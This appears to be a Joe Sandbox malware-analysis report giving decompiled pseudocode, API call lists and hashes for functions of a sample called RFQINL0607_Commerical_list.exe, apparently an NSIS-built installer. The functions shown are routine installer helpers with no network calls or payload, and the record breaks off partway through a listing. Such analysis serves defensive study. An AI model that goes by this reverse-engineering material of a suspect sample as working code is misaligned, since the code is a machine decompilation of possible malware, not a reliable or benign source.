                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                                  • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                                                                                                  • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                                                                                                                                  • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040588F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                                                  			E0040588F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405D2F(0x42ac70, _a4);
				_t21 = E0040583A(0x42ac70);
				if(_t21 != 0) {
					E00405F9A(_t21);
					if(( *0x42e418 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42ac70;
						while(1) {
							_t11 = lstrlenA(0x42ac70);
							_push(0x42ac70);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406033();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E004057E8(0x42ac70);
								continue;
							} else {
								goto L1;
							}
						}
						E004057A1();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                                                                                                  0x0040589b
                                                                                                                                                                                  0x004058a6
                                                                                                                                                                                  0x004058aa
                                                                                                                                                                                  0x004058b1
                                                                                                                                                                                  0x004058bd
                                                                                                                                                                                  0x004058c9
                                                                                                                                                                                  0x004058c9
                                                                                                                                                                                  0x004058e1
                                                                                                                                                                                  0x004058e2
                                                                                                                                                                                  0x004058e9
                                                                                                                                                                                  0x004058ea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004058cd
                                                                                                                                                                                  0x004058d4
                                                                                                                                                                                  0x004058dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004058d4
                                                                                                                                                                                  0x004058ec
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405900
                                                                                                                                                                                  0x004058bf
                                                                                                                                                                                  0x004058c3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004058c3
                                                                                                                                                                                  0x004058ac
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Baptistisk Setup,NSIS Error), ref: 00405D3C
                                                                                                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,762C3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                                                                                  • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,762C3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,762C3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,762C3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                  • API String ID: 3248276644-3355392842
                                                                                                                                                                                  • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                                                                                  • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                                                                                                                  • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                  			E00404EBC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x429854 - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x429854 = _t16;
								E00404893();
							}
						}
						L11:
						return CallWindowProcA( *0x42985c, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404813(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E00403F60(0x413);
					return 0;
				}
				goto L10;
			}






                                                                                                                                                                                  0x00404ec0
                                                                                                                                                                                  0x00404eca
                                                                                                                                                                                  0x00404ee0
                                                                                                                                                                                  0x00404ee6
                                                                                                                                                                                  0x00404f08
                                                                                                                                                                                  0x00404f0b
                                                                                                                                                                                  0x00404f0b
                                                                                                                                                                                  0x00404f11
                                                                                                                                                                                  0x00404f13
                                                                                                                                                                                  0x00404f19
                                                                                                                                                                                  0x00404f1b
                                                                                                                                                                                  0x00404f1c
                                                                                                                                                                                  0x00404f1e
                                                                                                                                                                                  0x00404f24
                                                                                                                                                                                  0x00404f24
                                                                                                                                                                                  0x00404f19
                                                                                                                                                                                  0x00404f2e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404f3c
                                                                                                                                                                                  0x00404eeb
                                                                                                                                                                                  0x00404ef1
                                                                                                                                                                                  0x00404ef3
                                                                                                                                                                                  0x00404f2b
                                                                                                                                                                                  0x00404f2b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404f2b
                                                                                                                                                                                  0x00404eff
                                                                                                                                                                                  0x00404f01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404f01
                                                                                                                                                                                  0x00404ed0
                                                                                                                                                                                  0x00404ed7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404edc
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                                                                                                                    • Part of subcall function 00403F60: SendMessageA.USER32(000103C8,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                                  • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                                                                                                  • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040361A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42882c; // 0x74a5c8
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42882c =  *0x42882c & 0x00000000;
				return _t3;
			}







                                                                                                                                                                                  0x0040361b
                                                                                                                                                                                  0x00403623
                                                                                                                                                                                  0x0040362a
                                                                                                                                                                                  0x0040362d
                                                                                                                                                                                  0x0040362d
                                                                                                                                                                                  0x0040362f
                                                                                                                                                                                  0x00403634
                                                                                                                                                                                  0x0040363b
                                                                                                                                                                                  0x00403641
                                                                                                                                                                                  0x00403645
                                                                                                                                                                                  0x00403646
                                                                                                                                                                                  0x0040364e

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,762C3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                                                                                                                  • GlobalFree.KERNEL32(0074A5C8), ref: 0040363B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                  • API String ID: 1100898210-3355392842
                                                                                                                                                                                  • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                                                                                                  • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                                                                                                                  • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004057E8(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                                                                                  0x004057e9
                                                                                                                                                                                  0x004057f3
                                                                                                                                                                                  0x004057f5
                                                                                                                                                                                  0x004057fc
                                                                                                                                                                                  0x00405804
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405804
                                                                                                                                                                                  0x00405806
                                                                                                                                                                                  0x0040580b

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,80000000,00000003), ref: 004057EE
                                                                                                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,80000000,00000003), ref: 004057FC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                                                  • API String ID: 2709904686-3370423016
                                                                                                                                                                                  • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                                  • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                                                                                                                                  • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001266(E100012AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012D1( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001508(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001508( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                                                                                                  0x100010e7
                                                                                                                                                                                  0x100010ef
                                                                                                                                                                                  0x10001103
                                                                                                                                                                                  0x1000110b
                                                                                                                                                                                  0x10001116
                                                                                                                                                                                  0x10001119
                                                                                                                                                                                  0x10001121
                                                                                                                                                                                  0x10001124
                                                                                                                                                                                  0x10001126
                                                                                                                                                                                  0x100011c4
                                                                                                                                                                                  0x100011d0
                                                                                                                                                                                  0x1000112c
                                                                                                                                                                                  0x1000112d
                                                                                                                                                                                  0x1000112d
                                                                                                                                                                                  0x10001130
                                                                                                                                                                                  0x10001131
                                                                                                                                                                                  0x10001134
                                                                                                                                                                                  0x10001203
                                                                                                                                                                                  0x10001206
                                                                                                                                                                                  0x1000119e
                                                                                                                                                                                  0x100011a4
                                                                                                                                                                                  0x100011ac
                                                                                                                                                                                  0x100011b1
                                                                                                                                                                                  0x100011b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100011b4
                                                                                                                                                                                  0x10001209
                                                                                                                                                                                  0x1000120a
                                                                                                                                                                                  0x10001186
                                                                                                                                                                                  0x1000118c
                                                                                                                                                                                  0x10001194
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001194
                                                                                                                                                                                  0x10001152
                                                                                                                                                                                  0x10001153
                                                                                                                                                                                  0x1000115b
                                                                                                                                                                                  0x10001168
                                                                                                                                                                                  0x10001170
                                                                                                                                                                                  0x10001179
                                                                                                                                                                                  0x1000117e
                                                                                                                                                                                  0x1000117e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001153
                                                                                                                                                                                  0x1000113a
                                                                                                                                                                                  0x100011d1
                                                                                                                                                                                  0x100011d1
                                                                                                                                                                                  0x100011d8
                                                                                                                                                                                  0x100011e5
                                                                                                                                                                                  0x100011ea
                                                                                                                                                                                  0x100011ef
                                                                                                                                                                                  0x100011f5
                                                                                                                                                                                  0x100011fb
                                                                                                                                                                                  0x100011fb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100011d8
                                                                                                                                                                                  0x10001140
                                                                                                                                                                                  0x10001143
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001149
                                                                                                                                                                                  0x1000114c
                                                                                                                                                                                  0x1000119b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000119b
                                                                                                                                                                                  0x1000114f
                                                                                                                                                                                  0x10001150
                                                                                                                                                                                  0x10001183
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001183
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100011ba
                                                                                                                                                                                  0x100011ba
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100011c3

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11531499304.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11531472460.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531531886.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531564017.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                                                                  • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                  • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00405907(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                                                                  0x00405917
                                                                                                                                                                                  0x00405919
                                                                                                                                                                                  0x0040591c
                                                                                                                                                                                  0x00405948
                                                                                                                                                                                  0x00405921
                                                                                                                                                                                  0x0040592a
                                                                                                                                                                                  0x0040592f
                                                                                                                                                                                  0x0040593a
                                                                                                                                                                                  0x0040593d
                                                                                                                                                                                  0x00405959
                                                                                                                                                                                  0x0040593f
                                                                                                                                                                                  0x00405946
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405946
                                                                                                                                                                                  0x00405952
                                                                                                                                                                                  0x00405956
                                                                                                                                                                                  0x00405956
                                                                                                                                                                                  0x00405950
